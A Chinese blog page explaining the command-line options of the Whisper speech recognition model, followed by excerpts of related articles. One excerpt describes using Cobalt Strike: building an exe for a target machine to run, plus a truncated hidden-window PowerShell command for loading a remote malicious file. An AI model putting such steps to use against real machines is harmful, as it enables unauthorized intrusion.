语音识别模型whisper的参数说明

news2025/1/11 14:08:47

一、whisper简介:

Whisper是一种通用的语音识别模型。它是在各种音频的大型数据集上训练的,也是一个多任务模型,可以执行多语言语音识别、语音翻译和语言识别。

二、whisper的参数

1、-h, --help

查看whisper的参数

2、--model {tiny.en,tiny,base.en,base,small.en,small,medium.en,medium,large-v1,large-v2,large} 

选择使用的模型,默认值:small

 3、--model_dir MODEL_DIR

模型文件的保存路径,默认值:~/.cache/whisper

4、--device DEVICE 

PyTorch接口使用的设备,默认值:CPU

5、--output_dir OUTPUT_DIR, -o OUTPUT_DIR

输出结果保存的目录,默认值:当前目录

6、--output_format {txt,vtt,srt,tsv,json,all}, -f {txt,vtt,srt,tsv,json,all}

输出文件的格式,默认值:all

7、--verbose VERBOSE

是否打印进展和debug信息,默认值:true

8、--task {transcribe,translate}

transcribe:语音转文字

translate:语音转英语

默认值:transcribe

9、--language {af,am,ar,as,az,ba,be,bg,bn,bo,br,bs,ca,cs,cy,da,de,el,en,es,et,eu,fa,fi,fo,fr,gl,gu,ha,haw,he,hi,hr,ht,hu,hy,id,is,it,ja,jw,ka,kk,km,kn,ko,la,lb,ln,lo,lt,lv,mg,mi,mk,ml,mn,mr,ms,mt,my,ne,nl,nn,no,oc,pa,pl,ps,pt,ro,ru,sa,sd,si,sk,sl,sn,so,sq,sr,su,sv,sw,ta,te,tg,th,tk,tl,tr,tt,uk,ur,uz,vi,yi,yo,zh,Afrikaans,Albanian,Amharic,Arabic,Armenian,Assamese,Azerbaijani,Bashkir,Basque,Belarusian,Bengali,Bosnian,Breton,Bulgarian,Burmese,Castilian,Catalan,Chinese,Croatian,Czech,Danish,Dutch,English,Estonian,Faroese,Finnish,Flemish,French,Galician,Georgian,German,Greek,Gujarati,Haitian,Haitian Creole,Hausa,Hawaiian,Hebrew,Hindi,Hungarian,Icelandic,Indonesian,Italian,Japanese,Javanese,Kannada,Kazakh,Khmer,Korean,Lao,Latin,Latvian,Letzeburgesch,Lingala,Lithuanian,Luxembourgish,Macedonian,Malagasy,Malay,Malayalam,Maltese,Maori,Marathi,Moldavian,Moldovan,Mongolian,Myanmar,Nepali,Norwegian,Nynorsk,Occitan,Panjabi,Pashto,Persian,Polish,Portuguese,Punjabi,Pushto,Romanian,Russian,Sanskrit,Serbian,Shona,Sindhi,Sinhala,Sinhalese,Slovak,Slovenian,Somali,Spanish,Sundanese,Swahili,Swedish,Tagalog,Tajik,Tamil,Tatar,Telugu,Thai,Tibetan,Turkish,Turkmen,Ukrainian,Urdu,Uzbek,Valencian,Vietnamese,Welsh,Yiddish,Yoruba}

音频文件的语言设置,设置为无则会进行语言检测

默认值:无

10、--temperature TEMPERATURE

用于取样的温度

默认值:0

11、--best_of BEST_OF 

在非零温度下采样时的候选数量

默认值:5

12、--beam_size BEAM_SIZE
 beam search 算法中beams的数量,只适用于temperature为0的情况

默认值:5
13、--patience PATIENCE

选项patience值用在beam解码,参考https://arxiv.org/abs/2204.05424, 默认情况下(1.0)相当于传统beam搜索

默认值:无
 14、--length_penalty LENGTH_PENALTY
 可选令牌长度惩罚系数(alpha)参考https://arxiv.org/abs/1609.08144,默认情况下使用简单长度规格化

默认值:无
 15、--suppress_tokens SUPPRESS_TOKENS
要在采样期间抑制的以逗号分隔的令牌ID列表;'-1'将抑制除常见标点符号以外的大多数特殊字符默认值:-1
 16、--initial_prompt INITIAL_PROMPT
 可选的文本作为第一个窗口的提示词

默认值:无
17、--condition_on_previous_text CONDITION_ON_PREVIOUS_TEXT

如果为true,则前一个模型的输出会作为下一个窗口的提示,禁用可能导致窗口之间的文本不一致,但该模型不太容易陷入故障循环

默认值:true
18、--fp16 FP16

是否使用FP16

默认值:true
19、--temperature_increment_on_fallback TEMPERATURE_INCREMENT_ON_FALLBACK
当解码失败遇到下面任意一个的阈值回退的时候温度将增加

默认值: 0.2
20、--compression_ratio_threshold COMPRESSION_RATIO_THRESHOLD
如果gzip压缩率大于这个值,认为解码失败
默认值:2.4
21、--logprob_threshold LOGPROB_THRESHOLD
如果平均对数概率低于此值,认为解码失败
默认值:-1.0
22、--no_speech_threshold NO_SPEECH_THRESHOLD
如果|nospeech|的概率高于此值并且因为 `logprob_threshold`解码失败,认为此片段没有声音

默认值:0.6
23、--word_timestamps WORD_TIMESTAMPS
提取单词级别的时间戳,并根据它们细化结果 (实验性质的) 

默认值:False
24、--prepend_punctuations PREPEND_PUNCTUATIONS

如果word_timestamps设置为true,将这些标点符号与后一个单词合并

默认值:"'“¿([{-
25、--append_punctuations APPEND_PUNCTUATIONS

如果word_timestamps设置为true,将这些标点符号与前一个单词合并

默认值:"'.。,,!!??::”)]}、
26、--highlight_words HIGHLIGHT_WORDS
在srt和vtt中说出的每个单词下面加下划线(条件:--word_timestamps True)

默认值: false
27、--max_line_width MAX_LINE_WIDTH

换行之前,一行最大多少个字符 (条件:--word_timestamps True)

默认值: 无
28、--max_line_count MAX_LINE_COUNT
一个片段中最大包含几行 (条件:--word_timestamps True)

默认值: 无
29、--threads THREADS

在CPU接口下,torch使用的线程数量,取代 MKL_NUM_THREADS/OMP_NUM_THREADS

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/713968.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

分布式锁及实现方式

一、背景 什么是锁? 在单进程的系统中,当存在多个线程可以同时改变某个变量(可变共享变量)时,就需要对变量或代码块做同步,使其在修改这种变量时能够线性执行消除并发修改变量。而同步的本质是通过锁来实…

cobaltstrike使用

./teamserver 192.168.137.4 # 启动服务端 ./cobaltstrike # 启动客户端先创建一个监听Listener 1. exe 生成exe文件后,传给靶机,让其执行 2. powershell 在靶机中执行下面这段代码即可,就是远程恶意文件加载 powershell.exe -nop -w hi…

flask +vue3 cas 单点登录(sso)

最近在研究前端vue3ts 后端使用flask 搭建的系统涉及到单点登录问题,这里进行一次总结。 关于cas 单点登录的逻辑,网上介绍的很详细,我这里就说说,我所理解的单点登录: 主要是2种情形: 1.通过平台登录之后 调用子系…

[Qt 教程之Widgets模块] —— QFontComboBox 字体选择器

Qt系列教程总目录 文章目录 3.2.1 创建 QFontComboBox3.2.2 成员函数1. 书写系统2. 字体过滤器3. 当前字体4. 信号 该控件用于选择字体,在一些软件中经常有类似控件,如下: Microsoft Office: Photoshop: QFontComboB…

1759_C语言中冒泡排序的实现以及新编译环境测试

全部学习汇总: GreyZhang/c_basic: little bits of c. (github.com) 最近在重新学习C语言的数据结构,找了一份国外的电子书一点点看。刚刚学完双向链表,接下来的任务是搞定几个常用的排序。 冒泡排序还算是我比较熟悉的,工作之后…

Java数据结构和算法-----数组

1、Java数组介绍 在Java中,数组是用来存放同一种数据类型的集合,注意只能存放同一种数据类型(Object类型数组除外)。 ①、数组的声明 第一种方式: 1 数据类型 [] 数组名称 new 数据类型[数组长度]; 这里 [] 可以放在数组名称的前面&#…

Idea整合Maven安装及配置教程(图文详解)

目录 友情提醒第一章、Maven概述1.1)Maven是什么1.2)Maven进行构建(build)的主要环节 第二章、Maven的下载安装和配置2.1)Maven的下载2.2)Maven环境变量配置2.3)Maven文件setting的配置 第三章、…

python+selenium自动化测试学习—手动搭建selenium环境

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 pythonselenium自动化测试学习—手动搭建selenium环境 一、简介二、安装selenium三、下载浏览器驱动四、搭建selenium环境 一、简介 selenium是一个免费开源的,仅…

FOC-滑膜控制器SMC/滑膜观测器SMO

目录 前面 滑膜速度控制器 控制器所处位置 理论设计 模型搭建 滑膜观测器 基本原理 反正切函数 锁相环 滑膜观测器模型(反正切) 滑膜观测器C代码实现 SMO.c SMO.h 前面 滑膜常见用处有两个: 1、作为滑膜控制器SMC,…

日本电子电器PSE认证METI备案、结构分析函报告详细解答

PSE认证是日本强制性安全认证,用以证明电子电气产品已通过日本电气和原料安全法 (DENAN Law) 或国际IEC标准的安全标准测试,457种产品进入日本市场必须通过PSE认证,其中,116种A类产品为特定电器和材料类,须获取认证并加…

机器学习中的Embeddings是什么

嵌入已经渗透到数据科学家的工具包中,并极大地改变了 NLP、计算机视觉和推荐系统的工作方式。然而,许多数据科学家发现它们过时且令人困惑。更多的人在不了解它们是什么的情况下盲目地使用它们。在本文中,我们将深入探讨嵌入是什么、它们如何…

【vue3】14-Vue全家桶-VueX状态管理

Vue全家桶 - VueX状态管理 认识应用状态管理VueX的状态管理 Vuex状态管理详解Vuex的基本使用单一状态树核心概念State组件获取状态setup中获取状态 核心概念Gettersgetters基本使用getters辅助函数 核心概念MutationsMutation基本使用mutation携带数据Mutation常量类型Mutation…

ModaHub魔搭社区:Zilliz Cloud 多组织与角色管理功能,让你的权限管理更简单!

目录 组织与角色功能简介 如何使用组织与角色功能? Zilliz Cloud 云服务是一套高效、高度可扩展的向量检索解决方案。近期,我们发布了 Zilliz Cloud 新版本,在 Zilliz Cloud 向量数据库中增添了许多新功能。其中,用户呼声最高的…

从零开始备战数学建模国赛之线性规划1.1

从零开始备战数学建模国赛之线性规划1.1 现在距离2023年的数学建模国赛还有不足三个月的时间,想与大家共同备战国赛。 这是我自己总结的一些代码和资料(本文中的代码以及参考书籍等),放在github上供大家参考:https://…

流量控制 Sentinel

一、Sentinel(哨兵)简介 1、Sentinel的功能及特点 1.Sentinel的功能 Sentinel的支持 2.Sentinel的特点 Sentinel的特点 2、Sentinel的组成 核心库(Java 客户端)不依赖任何框架/库,能够运行于所有 Java 8 及以上的运行时环境,同…

HMAC算法详解

1.HMAC算法 1.1 HMAC算法简介 HMAC(Hash-based Message Authentication Code,散列消息认证码)是一种使用密码散列函数,同时结合一个加密密钥,通过特别计算方式之后产生的消息认证码(MAC)。它可…

Go语言使用中遇到的错误

Go语言使用中遇到的错误 1、go: go.mod file not found in current directory or any parent directory. 先运行这一行代码: go mod init name再运行你的 go get 命令就好了。 2、Failed to build the application: main.go:4:2: package generateproject/route…

C++之报错:is an inaccessible base of(一百四十五)

简介: CSDN博客专家,专注Android/Linux系统,分享多mic语音方案、音视频、编解码等技术,与大家一起成长! 优质专栏:Audio工程师进阶系列【原创干货持续更新中……】🚀 人生格言: 人生…

物业管理变牛的好办法,新手零基础必备!

随着城市化进程的加速和商务发展的蓬勃,写字楼作为商业活动的核心场所,在现代都市生活中扮演着至关重要的角色。 随之而来的安全威胁和管理难题也日益凸显。因此,为了确保写字楼内部的安全与秩序,提高工作人员和访客的出入效率&am…

slab 内存池的设计与实现

目录 从一个简单的内存页开始聊 slab slab 的总体架构设计 slab 的组织架构 ​编辑 ​编辑 参考文献 伙伴系统内存分配原理的相关内容来看,伙伴系统管理物理内存的最小单位是物理内存页 page。也就是说,当我们向伙伴系统申请内存时,至少…